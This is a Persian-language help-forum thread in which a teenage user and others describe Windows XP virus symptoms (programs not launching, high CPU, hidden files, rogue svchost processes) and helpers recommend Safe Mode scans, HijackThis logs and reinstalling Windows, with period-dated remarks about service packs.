من قبلا به راحتی می تونستم فیلم یا کلیپ با کامپیوتر ببینم ولی الان که میرم کلیپ ببینم می بینم سرعت خیلی پایینه و از طریق task manager می بینم cpu usage شده 100 درصد ولی قبلا این طور نبود.
6- کامپیوتر را ریستارت کردم ولی حالا در حالت عادی که هیچ پنجره ای باز نیست سی پی یو یوزیج زیاد است و گاهی 100 درصد و گاهی هم 90 یا 80 و ... می شود!!!
7- این کاسپر اسکای نصب نشد!هیچ نرم افزاری نصب نمی شود با این حالت!!!پس باید بیخیال نصب نرم افزارها یا آنتی ویروس های مختلف شد.
8- مثال با عکس:مثلا من نرم فزار نارسیس را باز کردم.به جای آنکه نرم افزار بیاید یک صفحه به این شکل آمد!

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
سوالات من:
1- چطور سیستم ریستور را غیر فعال کنم؟بعدن میشه فعالش کنم؟
2- safe mod چیه؟توضیح کامل لطفا.!!!!!!!!!!!
3- منظورم را (از توضیحی که برای ویروس دادم) خوب متوجه شدید و فهمیدید ویروس هست یا نه و نوع ویروس را فهمیدید یا توضیحات بیشتری بدهم؟

جواب منم بدید.یه چیز دیگه هم کشف کردم!این ویروسم سرعت رو خیلی کم کرده(سرعت سیستم).
من قبلا به راحتی می تونستم فیلم یا کلیپ با کامپیوتر ببینم ولی الان که میرم کلیپ ببینم می بینم سرعت خیلی پایینه و از طریق task manager می بینم cpu usage شده 100 درصد ولی قبلا این طور نبود.
لطفا زودتر.
ویرایش جدید:
1- کامپیوتر را ریستارت کردم ولی حالا در حالت عادی که هیچ پنجره ای باز نیست سی پی یو یوزیج زیاد است و گاهی 100 درصد و گاهی هم 90 یا 80 و ... می شود!!!
2- این کاسپر اسکای نصب نشد!هیچ نرم افزاری نصب نمی شود با این حالت!!!
ویرایش:
بالاخره تونستم کاری کنم که براتون عکس بزارم.!
--------------------------------------------------------------------------------------------------------------------------------------------------
================================================== =======================
ویرایش:
برای این که گیج نشوید تمام اطلاعات را که تا به حال به دست آوردم این جا یک جا می گذارم!
اطلاعات من از این ویروس:
1- به احتمال زیاد این یک ویروس است!(یعنی من به کامپیوتر کخ نریختم که این طور شود ویروس این طورش کرده به احتمال زیاد)
2- رو هر فایل exe یا هر نرم افزاری کلیک می کنم یک فایل نوتپد با نوشته های عجیب و غریب میاد که واسه هر نرم افزاری یه جوره.نرم افزار پینت هم به دلیل این ویروس خرابه .
3- با این که پینت خرابه ولی عکس های قبلیمو با کلیک راست توسط پینت باز کردم و با پرینت اسکرین عکس گرفتم و تو صفحه پینت کپی کردم.بعد ذخیره کردم و بعد هم آپلود.
4- راستی الان آیکن آنتی ویروسم(بیت دفندر)همون مشکل براش پیش اومده و کار نمی کنه!
5- یه چیز دیگه هم کشف کردم!این ویروسم سرعت رو خیلی کم کرده(سرعت سیستم).
من قبلا به راحتی می تونستم فیلم یا کلیپ با کامپیوتر ببینم ولی الان که میرم کلیپ ببینم می بینم سرعت خیلی پایینه و از طریق task manager می بینم cpu usage شده 100 درصد ولی قبلا این طور نبود.
6- کامپیوتر را ریستارت کردم ولی حالا در حالت عادی که هیچ پنجره ای باز نیست سی پی یو یوزیج زیاد است و گاهی 100 درصد و گاهی هم 90 یا 80 و ... می شود!!!
7- این کاسپر اسکای نصب نشد!هیچ نرم افزاری نصب نمی شود با این حالت!!!پس باید بیخیال نصب نرم افزارها یا آنتی ویروس های مختلف شد.
8- مثال با عکس:مثلا من نرم فزار نارسیس را باز کردم.به جای آنکه نرم افزار بیاید یک صفحه به این شکل آمد!

اگه عکس دیر لود شد برید اینجا:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
سوالات من:
1- چطور سیستم ریستور را غیر فعال کنم؟بعدن میشه فعالش کنم؟
2- safe mod چیه؟توضیح کامل لطفا.!!!!!!!!!!!
3- منظورم را (از توضیحی که برای ویروس دادم) خوب متوجه شدید و فهمیدید ویروس هست یا نه و نوع ویروس را فهمیدید یا توضیحات بیشتری بدهم؟

سلام دوست عزیز

در این که این یک ویروس است شکی نیست از همان پست اولتان مشخص بود با توجه به اینکه قادر به اجرای هیچ

برنامه ای نیستید و با در نظر گرفتن اینکه شما هنوز تجربه لازم در کار با کامپیوتر را ندارید بهترین کار در شرایط شما

پاک کردن ویندوز قبلی و فورمت پارتیشن ویندوز و نصب یک ویندوز جدید است فکر می کنم این طوری هم دردسر

کمتری برایتان پیش می آید و هم وقت کمتری تلف می کنید .وگرنه راه حل دوست عزیزم Persian.Boy

را هم در این پست امتحان کن این نرم افزار نیازی به نصب ندارد و اگر بتواند ویروس را شناسایی و پاک کند مشکلت را

شاید بتوان حل کرد :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام.وقتی ویندوز بالا می یاد پیغامtemp.exe می اید وبعدهمه فولدرهاحجم65کیلوبایت رانشان میدهندوهرچی هست فقط میدانم تروجان مهسا کهnew Folder در داخل خودش میسازد نیست....کمک کنید

سلام دوست عزیز

اول System Restore را غیر فعال کن بعد این برنامه را داونلود و اجرا کن و پس از آن با یک آنتی ویروس درست و حسابی یک بار دیگر

سیستم را اسکن و هر چه را پیدا کرد پاک کن باز اگر مشکلی بود ما در خدمتیم:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نرم افزارها باز نمی شوند ولی امتحان می کنم اما7-6 مگابایته!!!

این همه دانلود کردم ولی نشد.
اگه ویندوز عوض کنم که همه فایل هام میپره و نرم افزار رایترمم عین بقیه خرابه!

من سیستمم دچار یه ویروس شده که وقتی ویندوز رو هم عوض کردم، هنوز هستش. این ویروس به طوریه که وقتی به جزییات یه پوشه نگاه می کنی، پوشه حجم خودش رو داره ولی وقتی واردش میشی چیزی نیست!
فکر کنم حساسیتش فقط به فایل های صوتی، تصویری و عکس باشه. با آنتی ویروس های آپدیت شده NOD32 ـ McAfee ـ Norton ـ Avast ـ AVG ـ Big Defender سیستم رو چک کردم ولی هیچ چیزی پیدا نشد.
اینو هم بگم با نرم افزار هایی مثل Nero میشه فایل ها رو نگاه کرد

با سلام
قبلا هم این مشکل را مطرح کرده ام ولی کسی نتوانسته کمکم کند.

اخیرا مبتلا به ویروسی شدم که عملکردی مشابه jeefo دارد یعنی در taskmanager من 7 عدد فایل svchost فعال است که در صورت بستن یکی از آنها فرمان خاموش شدن تا 60 ثانیه را میدهد.

ولی برخلاف jeefo که مصرف cpu را بالا می برد این ویروس 80 درصد پهنای باند مرا می بلعد و شروع بع دانلود چیز های ناشناخته می کند. در حالیکه 10 کی دانلود دارم فقط 2 کی به فایلم اضافه میشود. ضمنا فوق العاده هوشمند است و وقتی شما کاری نمیکنید او هم به اینترنت کاری ندارد . ولی به محض شروع وبگردی یا دانلود برنامه او هم با تمام وجود شروع با دانلود می کند.

در صورتیکه دوستان در این مورد اطلاعاتی دارند لطفا کمک کنن.
الان کسپر 7 آپدیت دارم و لی یک وانت وبروس کش را هم امتحان کرده ام و به نتیجه نرسیدهام .
با تشکر

این همه دانلود کردم ولی نشد.
اگه ویندوز عوض کنم که همه فایل هام میپره و نرم افزار رایترمم عین بقیه خرابه!

چی نشد؟ آنتی ویروس باز نمیشه یا اینکه چیزی رو تشخیص نداده.

با این مشخصاتی که شما گفتید حتما این آنتی ویروس اون رو شناسایی میکنه چون دارای هوش مصنوعی قویی هست.

اگر نرم افزار قابل اجرا شدن نیست بهترین کارتون اینه که اونو در Safe Mode اجرا کنید. برای ورود به Safe Mode وقتی که

ویندوز در حال بالا آمدن است قبل از اینکه بالا بیاد و شروع به لود کنه شما دکمه F8 و در بعضی سیستم ها ممکنه F10

باشه رو بزنید. بعد برید روی قسمتی که نوشته Safe Mode و Enter رو بزنید.

در هنگام ورود به این قسمت هم هر پیغامی دریافت کردید Yes رو بزنید. و قبل از اجرای DureIt نام آن را تغییر دهید و بعد

اجراش کنید. مثلا اسمش رو بزارید Ghofl Shekan و یا هر چیزی که دوست داشتید.

اجرا نشد!
الان این راهو امتحان می کنم.نتیجه را میگم.

من الان safe mod کردم.
نتیجه:نیومد.
توضیح:کامپیوتر را ریستارت کردم و وقتی بالا آمد سریع و یکسره f8 زدم تا صفحه سیاهی اومد که اولین گزینش safe mod بود رفتم رو اون و اینتر زدم.یه صفحه اومد که توش کلی چیز نوشته بود(صفحه سیاه) .فکر کنم یه لیست آدرس بود!بعد من کاری نکردم سیستم ریستارت شد .فکر کنم 4 تا گزینه داشت یکیش safe mod و دیگری یه چیزی ویندوز نرمالی(... ویندوز نرمالی) بود رو safe mod که می رفتم دوباره سیستم ریستارت می شد و روز از نو و روزی از نو ولی ویندوز نرمالی را که زدم برگشتم به همین ویندوز!میگم اگه راه رو اشتباه رفتم شما آموزش تصویری قدم به قدم داری؟راستی با سیستم ریستور درست نمیشه؟
من در بخش کامپیوتر هم یه تایپیک در همین مورد زدم چون گفتم کارشناسای این جا ویروس یابند و اگه ویروس باشه می تونند کمک کنند ولی اونجا اگه مشکل از کامپیوتر باشه .بنابراین هر دو جا باشه بهتره.آدرسش تو امضامه.خواستید بیاید اونجا.

با سلام
قبلا هم این مشکل را مطرح کرده ام ولی کسی نتوانسته کمکم کند.

اخیرا مبتلا به ویروسی شدم که عملکردی مشابه jeefo دارد یعنی در taskmanager من 7 عدد فایل svchost فعال است که در صورت بستن یکی از آنها فرمان خاموش شدن تا 60 ثانیه را میدهد.

ولی برخلاف jeefo که مصرف cpu را بالا می برد این ویروس 80 درصد پهنای باند مرا می بلعد و شروع بع دانلود چیز های ناشناخته می کند. در حالیکه 10 کی دانلود دارم فقط 2 کی به فایلم اضافه میشود. ضمنا فوق العاده هوشمند است و وقتی شما کاری نمیکنید او هم به اینترنت کاری ندارد . ولی به محض شروع وبگردی یا دانلود برنامه او هم با تمام وجود شروع با دانلود می کند.

در صورتیکه دوستان در این مورد اطلاعاتی دارند لطفا کمک کنن.
الان کسپر 7 آپدیت دارم و لی یک وانت وبروس کش را هم امتحان کرده ام و به نتیجه نرسیدهام .
با تشکر

دوست عزیز

svchost.exe از پروسه های حیاتی ویندوز به شمار می رود .مسیر واقعی آن Windows\System32 می باشد .

بعضی از ویروسها فایلی با همین نام را معمولا در پوشه ویندوز ( ولی نه در System32 ) ایجاد می کنند .الته بعضی

نیز کدهای خود را به داخل svchost.exe تزریق می کنند که حساب این گونه موارد جدا است .این یعنی این که هر

svchost.exe که در Task Manager می بینی ویروس نیست بنابراین اگر آنها را از کار بیاندازی ویندوز ریستارت خواهد

کرد .البته این به این معنی نیست که سیستم شما آلوده نیست .ممکن است سیستم شما آلوده به تروجان یا

کرمی باشد که هنوز توسط آنتی ویروسها قابل شناسایی نیست .شما دو راه زیر را امتحان کن :

اولا روی سیستمت یک فایروال قوی نصب کن تا جلوی هرگونه اتصال به اینترنت غیر مجاز را سد کند دوم اینکه فایل

زیر را با حجم 208 کیلوبایت داونلود و اجرا کنید.در صفحه اول گزینه Do a system scan and save a logfile را انتخاب

و گزارش اسکن رابه طور کامل اینجا Copy&Past کنید:

HijacThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

اگر اجازه اجرای این برنامه را نداد نام آن را تغییر دهید و دوباره امتحان کنید باز اگر اجرا نشد در حالت Safe Mode

امتحان کنید ولی اگر باز هم نشد بگویید تا شاید راه دیگری پیدا کنیم.

من الان safe mod کردم.
نتیجه:نیومد.
توضیح:کامپیوتر را ریستارت کردم و وقتی بالا آمد سریع و یکسره f8 زدم تا صفحه سیاهی اومد که اولین گزینش safe mod بود رفتم رو اون و اینتر زدم.یه صفحه اومد که توش کلی چیز نوشته بود(صفحه سیاه) .فکر کنم یه لیست آدرس بود!بعد من کاری نکردم سیستم ریستارت شد .فکر کنم 4 تا گزینه داشت یکیش safe mod و دیگری یه چیزی ویندوز نرمالی(... ویندوز نرمالی) بود رو safe mod که می رفتم دوباره سیستم ریستارت می شد و روز از نو و روزی از نو ولی ویندوز نرمالی را که زدم برگشتم به همین ویندوز!میگم اگه راه رو اشتباه رفتم شما آموزش تصویری قدم به قدم داری؟راستی با سیستم ریستور درست نمیشه؟
من در بخش کامپیوتر هم یه تایپیک در همین مورد زدم چون گفتم کارشناسای این جا ویروس یابند و اگه ویروس باشه می تونند کمک کنند ولی اونجا اگه مشکل از کامپیوتر باشه .بنابراین هر دو جا باشه بهتره.آدرسش تو امضامه.خواستید بیاید اونجا.

سلام دوست من

به نظر می رسد که این ویروس از رفتن به Safe Mode هم جلوگیری می کند و من همچنان پیشنهاد می کنم تا ویندوز را

عوض کنی .برای این کار حتما لازم نیست کل هارد را فرمت کنی فقط پارتیشن ویندوز کافی است اگر فایلی داری ( به جز

فایلهای اجرایی ) که می خواهی نگهداری و قبلا از آنها پشتیبان تهیه نکرده ای آنها را به یک پارتیشن دیگر منتقل کن

تا با فورمت پارتیشن ویندوز مشکلی برای آنها پیش نیاید .پس از نصب ویندوز قبل از هر کاری کاسپرسکی را نصب کن

و سیستمت را به طور کامل اسکن کن .اگر چیزی پیدا نکرد می توانی از آنها استفاده کنی.

منظورتون از پارتیشن(من 14 سالمه و هنوز چیزی سر در نمیارم!) همون درایو هست؟یعنی میگید درایو c را فرمت کنم؟تو تایپیکی که تو امضامه هم یکی از دوستان گفت.اگه تونستید یه سر به اون جا بزنید.

منظورتون از پارتیشن(من 14 سالمه و هنوز چیزی سر در نمیارم!) همون درایو هست؟یعنی میگید درایو c را فرمت کنم؟تو تایپیکی که تو امضامه هم یکی از دوستان گفت.اگه تونستید یه سر به اون جا بزنید.

دوست من

پارتیشن همان درایو است , اگر قبلا ویندوز را به این طریق نصب نکرده اید من توصیه می کنم تنهایی اقدام به این کار نکنید

چون ممکن است به درایوهای دیگرتان آسیب بزنید و از یک دوست با تجربه تر در این زمینه کمک بگیرید تا در کنار خودتان این

کار را انجام بدهد تا مراحل کار را یاد بگیرید.با راهنمایی های از راه دور مشکل شما حل نمی شود چون اگر وسط کار

مشکلی هم پیش بیاید شما دسترسی به اینترنت نخواهید داشت و مشکلاتتان بیشتر می شود.

پس چاره ای نیست؟فقط باید اینکار را بکنم؟پس من فردا یا تو همین روزا کامپیوترو می برم کامپیوتری جای خونمون .
ببینید بهش این طور بگم خوبه:
پس بهش بگم که این مشکل برام پیش اومده و اگه راهی بلده انجام بده و اگه بلد نبود فقط درایو c را فرمت کنه و رویش ویندوز نصب کنه؟خوبه؟
از راهنماییتون ممنونم.هم از شما و هم از پرشن بوی .
پس وقتی ویندوزو عوض کردم بهتون خبر میدم که درست شد یا نه؟پس تا بعد.

پس چاره ای نیست؟فقط باید اینکار را بکنم؟پس من فردا یا تو همین روزا کامپیوترو می برم کامپیوتری جای خونمون .
ببینید بهش این طور بگم خوبه:
پس بهش بگم که این مشکل برام پیش اومده و اگه راهی بلده انجام بده و اگه بلد نبود فقط درایو c را فرمت کنه و رویش ویندوز نصب کنه؟خوبه؟
از راهنماییتون ممنونم.هم از شما و هم از پرشن بوی .
پس وقتی ویندوزو عوض کردم بهتون خبر میدم که درست شد یا نه؟پس تا بعد.

البته چند راه حل برای مشکل شما وجود دارد ولی همگی آنها نیاز به مهارت و تسلط دارد که با توجه به این که شما هنوز

در ابتدای راه هستید انجام آنها برایتان مشکل و وقت گیر خواهد بود و کاری که می خواهید بکنید بهترین راه است فقط به

آن دوست عزیز بگویید آخرین نسخه از سرویس پک 2 ویندوز XP ( را که فکر کنم مربوط به اکتبر 2006 است ) نصب کند واز

نصب نسخه های فارسی شده و یا تغییر داده شده ( مثل ویندوز XP سانتاکروز و ... ) خوداری کند بعدا اگر باز مشکلی بود

ما در خدمتیم .فقط یادت باشد برای این که چنین مشکلی دیگر برایت پیش نیاید پس از نصب ویندوز جدید حتما یک آنتی اسپایور

و آنتی ویروس و فایروال به صورت فعال روی سیستمت داشته باشی .

من سیستمم دچار یه ویروس شده که وقتی ویندوز رو هم عوض کردم، هنوز هستش. این ویروس به طوریه که وقتی به جزییات یه پوشه نگاه می کنی، پوشه حجم خودش رو داره ولی وقتی واردش میشی چیزی نیست!
فکر کنم حساسیتش فقط به فایل های صوتی، تصویری و عکس باشه. با آنتی ویروس های آپدیت شده NOD32 ـ McAfee ـ Norton ـ Avast ـ AVG ـ Big Defender سیستم رو چک کردم ولی هیچ چیزی پیدا نشد.
اینو هم بگم با نرم افزار هایی مثل Nero میشه فایل ها رو نگاه کرد

احتمالا این ویروس مشخصات فایلهای شما را تغییر داده است و آنها را Hidden یا Super Hidden کرده است .با تعویض

ویندوز به احتمال زیاد خود ویروس از بین رفته است ولی تغییرات ایجاد شده باقی مانده است شما گزینه های مربوطه (

نشان ندادن فایلهای Hidden یا Super Hidden ) را در قسمت View از Folder Option را از حالت انتخاب خارج کن فایلها

ظاهر می شوند بعد می توانی مشخصات آنها را در قسمت Property عوض کنی .

البته چند راه حل برای مشکل شما وجود دارد ولی همگی آنها نیاز به مهارت و تسلط دارد که با توجه به این که شما هنوز

در ابتدای راه هستید انجام آنها برایتان مشکل و وقت گیر خواهد بود و کاری که می خواهید بکنید بهترین راه است فقط به

آن دوست عزیز بگویید آخرین نسخه از سرویس پک 2 ویندوز XP ( را که فکر کنم مربوط به اکتبر 2006 است ) نصب کند واز

نصب نسخه های فارسی شده و یا تغییر داده شده ( مثل ویندوز XP سانتاکروز و ... ) خوداری کند بعدا اگر باز مشکلی بود

ما در خدمتیم .فقط یادت باشد برای این که چنین مشکلی دیگر برایت پیش نیاید پس از نصب ویندوز جدید حتما یک آنتی اسپایور

و آنتی ویروس و فایروال به صورت فعال روی سیستمت داشته باشی .

من الان ویندوز xp سرویس پک 3 (شنیدم همون 2 که ایرانی ها دستکاری کردند ) را دارم.برم سرویس پک 2 را نصب کنم؟
با سیستم ریستور به طور موقت درست نمیشه؟
من توضیحات خیلی کامل تری در تایپیکی که تو امضامه نوشتم لطفا به اونم سر بزن.
میشه یک توضیح کوتاه در مورد راه های دیگه بگید؟
ممنون.

سلام به همه دوستان
persian.boy جان امتحان کردم نشد.اگه ممکنه یه راه دیگه بگین

این چه تروجانی که همه فولدرهاحجم65کیلوبایت رانشان میدهندوهرچی هست فقط میدانم تروجان مهسا کهnew Folder در داخل خودش میسازد نیست....کمک کنید

راهنمایی ها چاره ساز نبود..

من الان ویندوز xp سرویس پک 3 (شنیدم همون 2 که ایرانی ها دستکاری کردند ) را دارم.برم سرویس پک 2 را نصب کنم؟
با سیستم ریستور به طور موقت درست نمیشه؟
من توضیحات خیلی کامل تری در تایپیکی که تو امضامه نوشتم لطفا به اونم سر بزن.
میشه یک توضیح کوتاه در مورد راه های دیگه بگید؟
ممنون.

سرویس پک 3 یک چیز ساختگی است و وجود خارجی ندارد و بهتر است همانطور که گفتم آخرین نسخه سرویس پک 2 را نصب کنید ,

مشکل شما با توجه به شدت آلودگی به احتمال قریب به یقین با System Restore حل نخواهد شد . راههای دیگر مانند استفاده از

Recovery Console و Rescue CD همانطور که قبلا گفتم نیاز به مهارت و معلومات بیشتری دارد و در حال حاظر به درد شما نمی خورد.